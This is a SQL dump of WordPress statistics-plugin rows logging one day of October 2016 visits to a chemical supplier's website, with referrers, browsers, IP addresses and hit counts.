INSERT INTO `wp_statistics_visitor` VALUES (4987, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.161.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4988, '2016-10-17', 'https://www.miller-stephenson.com', 'Vivaldi', 'Windows', '1.4.589.38', '', '213.189.136.90', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4989, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '141.227.1.32', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4990, '2016-10-17', 'https://www.valveindustrybuyersguide.com/Results.aspx?q=canada&Page=1&CategoryID=0&Type=0', 'Chrome', 'Windows', '53.0.2785.116', '', '14.141.250.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4991, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.84.14.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4992, '2016-10-17', 'https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwivgLeQvOHPAhXC1iwKHR0SD5wQFghJMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-225%2F&usg=AFQjCNE5xJhq-AfIzlo1kRJjNg972YkdHg&sig2=-asIn8nygxsZSsyqePvErw&cad=rjt', 'MSIE', 'Windows', '11.0', '', '95.79.111.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4993, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.179.34.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4994, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.46.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4995, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4996, '2016-10-17', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj10o70vuHPAhWBVRQKHeCSDkAQFgg0MAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-240ab%2F&usg=AFQjCNHkN_6R29TutjS9l-uP6lY6_5YA0A', 'MSIE', 'Windows', '11.0', '', '80.150.84.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4997, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.182.133.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4998, '2016-10-17', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '31.0.32.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4999, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.231.124.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5000, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.42.28.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5001, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '74.208.114.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5002, '2016-10-17', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5003, '2016-10-17', 'https://www.miller-stephenson.com', 'curl', 'Unknown', '7.35.0', '', '104.131.168.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5004, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.93.196.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5005, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.208.161.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5006, '2016-10-17', 'https://yourdesires.ru/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5007, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '64.71.32.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5008, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.104.86.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5009, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.235.71.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5010, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Macintosh', '35.0', '', '195.154.161.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5011, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.181.253.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5012, '2016-10-17', 'https://www.miller-stephenson.com/my-account/', 'Opera', 'Windows', '12.17', '', '107.172.81.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5013, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '45.33.30.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5014, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.122.195.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5015, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.29.178.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5016, '2016-10-17', 'https://www.google.co.jp/', 'Chrome', 'Windows', '53.0.2785.143', '', '211.7.159.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5017, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '222.122.190.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5018, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.46.152.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5019, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.193.238.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5020, '2016-10-17', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '37.152.46.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5021, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.36.161.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5022, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.5.106.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5023, '2016-10-17', 'https://www.google.co.za/', 'Chrome', 'Windows', '53.0.2785.143', '', '196.212.55.226', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5024, '2016-10-17', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwipxKrPyeHPAhXI1hoKHXZtBs0QFghGMAg&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-3234%2F&usg=AFQjCNFF35tFjHXDQW6vcODcuIs3UyDr5w&bvm=bv.135974163,d.d2s', 'MSIE', 'Windows', '11.0', '', '37.153.250.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5025, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5026, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '123.126.68.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5027, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.247.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5028, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.41.123.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5029, '2016-10-17', 'https://www.google.com.eg/', 'Chrome', 'Windows', '53.0.2785.143', '', '41.130.45.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5030, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.182.200.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5031, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.108.79.155', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5032, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.128.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5033, '2016-10-17', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.98.108.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5034, '2016-10-17', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '84.45.239.243', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5035, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.124.153.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5036, '2016-10-17', 'https://www.eng-tips.com/viewthread.cfm?qid=191550', 'Chrome', 'Windows', '53.0.2785.143', '', '82.68.236.166', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5037, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.45.219.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5038, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.68.2.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5039, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.25.121.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5040, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.252.115.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5041, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.52.255.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5042, '2016-10-17', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '212.175.18.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5043, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.191.79.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5044, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.215.90.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5045, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '62.210.148.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5046, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '45.55.229.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5047, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '45.55.229.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5048, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '45.55.229.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5049, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '45.55.229.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5050, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '45.55.229.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5051, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.131', '', '45.55.229.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5052, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '45.55.229.154', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5053, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '35.0.1916.114', '', '45.55.229.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5054, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '34.0.1847.131', '', '45.55.229.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5055, '2016-10-17', 'https://www.miller-stephenson.com/epoxy-resin/', 'Safari', 'Macintosh', '7.0.3', '', '45.55.229.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5056, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.82', '', '212.175.18.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5057, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.50.131.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5058, '2016-10-17', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '141.170.11.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5059, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.107.68.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5060, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '48.0.2564.109', '', '199.107.68.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5061, '2016-10-17', 'https://www.google.fi/', 'Chrome', 'Windows', '53.0.2785.143', '', '88.193.122.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5062, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '0.10.1', '', '192.99.45.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5063, '2016-10-17', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'MSIE', 'Windows', '10.0', '', '199.89.130.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5064, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '31.0.1650.57', '', '82.80.230.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5065, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Macintosh', '26.0', '', '82.80.230.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5066, '2016-10-17', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '32.0.1700.72', '', '82.80.230.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5067, '2016-10-17', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.16', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5068, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '24.0', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5069, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '25.0', '', '82.80.230.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5070, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '36.0', '', '82.80.230.228', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5071, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '26.0', '', '82.80.230.228', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5072, '2016-10-17', 'https://www.miller-stephenson.com/', 'Safari', 'Macintosh', '7.0', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5073, '2016-10-17', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '82.80.230.228', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5074, '2016-10-17', 'https://www.miller-stephenson.com/', 'Safari', 'Macintosh', '7.0.1', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5075, '2016-10-17', 'https://www.miller-stephenson.com/', 'Safari', 'Macintosh', '6.1.1', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5076, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '25.0', '', '82.80.230.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5077, '2016-10-17', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '29.0', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5078, '2016-10-17', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '82.80.230.228', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5079, '2016-10-17', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '31.0.1650.63', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5080, '2016-10-17', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '31.0.1650.63', '', '82.80.230.228', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5081, '2016-10-17', 'https://www.miller-stephenson.com/my-account/', 'Firefox', 'Windows', '27.0', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5082, '2016-10-17', 'https://www.miller-stephenson.com/my-account/', 'MSIE', 'Windows', '10.0', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5083, '2016-10-17', 'https://www.miller-stephenson.com/my-account/', 'Firefox', 'Linux', '26.0', '', '82.80.230.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5084, '2016-10-17', 'https://www.miller-stephenson.com/chemical-products/', 'Safari', 'Macintosh', '6.1', '', '82.80.230.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5085, '2016-10-17', 'https://www.miller-stephenson.com/articles/', 'Safari', 'Macintosh', '6.0.5', '', '82.80.230.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5086, '2016-10-17', 'https://www.miller-stephenson.com/articles/', 'Chrome', 'Windows', '12.0.742.91', '', '82.80.230.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5087, '2016-10-17', 'https://www.miller-stephenson.com/articles/', 'Chrome', 'Windows', '35.0.1916.153', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5088, '2016-10-17', 'https://www.miller-stephenson.com/articles/', 'Firefox', 'Macintosh', '25.0', '', '82.80.230.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5089, '2016-10-17', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5090, '2016-10-17', 'https://www.bing.com/search?q=MS-122AD%20difference%20ms-122xd&qs=n&form=QBRE&pq=ms-122ad%20difference%20ms-122xd&sc=0-28&sp=-1&sk=&cvid=98CAC0A1019D470BA73FB4EF51D7BFF6', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5091, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '138.162.0.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5092, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '138.162.0.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5093, '2016-10-17', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '138.162.0.41', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5094, '2016-10-17', 'https://www.bing.com/search?q=epikure+3223&qs=n&form=QBRE&pq=epikure+3223&sc=0-12&sp=-1&sk=&cvid=724D11D54B214D51881362485836E865', 'MSIE', 'Windows', '11.0', '', '131.137.245.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5095, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/lubricants/teflon-lubricants/', 'MSIE', 'Windows', '11.0', '', '138.162.0.42', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5096, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.149.34.245', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5097, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.107.59.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5098, '2016-10-17', 'https://www.miller-stephenson.com', 'YisouSpider', 'Unknown', 'Unknown', '', '42.156.136.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5099, '2016-10-17', 'https://www.bing.com/search?q=miller-stephenson%20chemical%20co.ms-143v%20ptfe%20mold%20release%20&qs=n&form=QBRE&pq=miller-stephenson%20chemical%20co.ms-143v%20ptfe%20mold%20release%20&sc=0-56&sp=-1&sk=&cvid=C362114C6A664916AA2B63EA99BECD33', 'MSIE', 'Windows', '11.0', '', '70.168.8.60', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5100, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '138.162.8.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5101, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiHwKO94uHPAhVRk34KHRxgC4kYABAA&ei=jroEWIHBOIT1mAHBlJjwBQ&sig=AOD64_3cHP3QW_qVrWj5qH5SlUOb539dHQ&rct=j&q=&sqi=2&ved=0ahUKEwiBwJ294uHPAhWEOiYKHUEKBl4Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '198.208.159.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5102, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '12.251.123.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5103, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.87.95.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5104, '2016-10-17', 'https://www.google.sk/', 'Chrome', 'Windows', '53.0.2785.143', '', '213.160.190.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5105, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.101.100.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5106, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.25.122.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5107, '2016-10-17', 'https://www.google.co.kr/', 'Chrome', 'Windows', '54.0.2840.59', '', '1.233.30.125', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5108, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 296, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5109, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.235.133.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5110, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5111, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.246.69.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5112, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '103.232.224.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5113, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.94.15.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5114, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.138.206.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5115, '2016-10-17', 'https://www.bing.com/search?q=Miller-Stephenson+MS-220+aero-duster+fiche+signalitique&qs=n&form=QBRE&pq=miller-stephenson+ms-220+aero-duster+fiche+signalitique&sc=0-55&sp=-1&sk=&cvid=E8658E5D68FA4AE2B7365CDD8114D63D', 'MSIE', 'Windows', '11.0', '', '205.211.133.128', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5116, '2016-10-17', 'https://r.search.yahoo.com/_ylt=AwrBTz01wgRYiBoABNNXNyoA;_ylu=X3oDMTEyb29zOWx1BGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjE4NzlfMQRzZWMDc3I-/RV=2/RE=1476735669/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=ajNzewLNPfP4uF_80r4u3NdcwJA-', 'MSIE', 'Windows', '11.0', '', '50.202.89.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5117, '2016-10-17', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.98.131.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5118, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.183.28.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5119, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '58.217.157.187', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5120, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5121, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.186.12.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5122, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.207.126.150', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5123, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '16.0.1', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5124, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.81.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5125, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwii3-qn8eHPAhWNe34KHZHhAhcYABAA&ei=HMoEWIX7HofNjwS71JvQBw&sig=AOD64_0-reU__8ifG00jPZOhloAPY3T1gg&rct=j&q=&sqi=2&ved=0ahUKEwiF-eWn8eHPAhWH5oMKHTvqBnoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '75.150.206.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5126, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.181.190.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5127, '2016-10-17', 'https://www.absolute-s.ru/', 'Opera', 'Windows', '8.50', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5128, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.91.2.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5129, '2016-10-17', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '212.252.132.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5130, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.140.0.204', '000', 1, 0); 
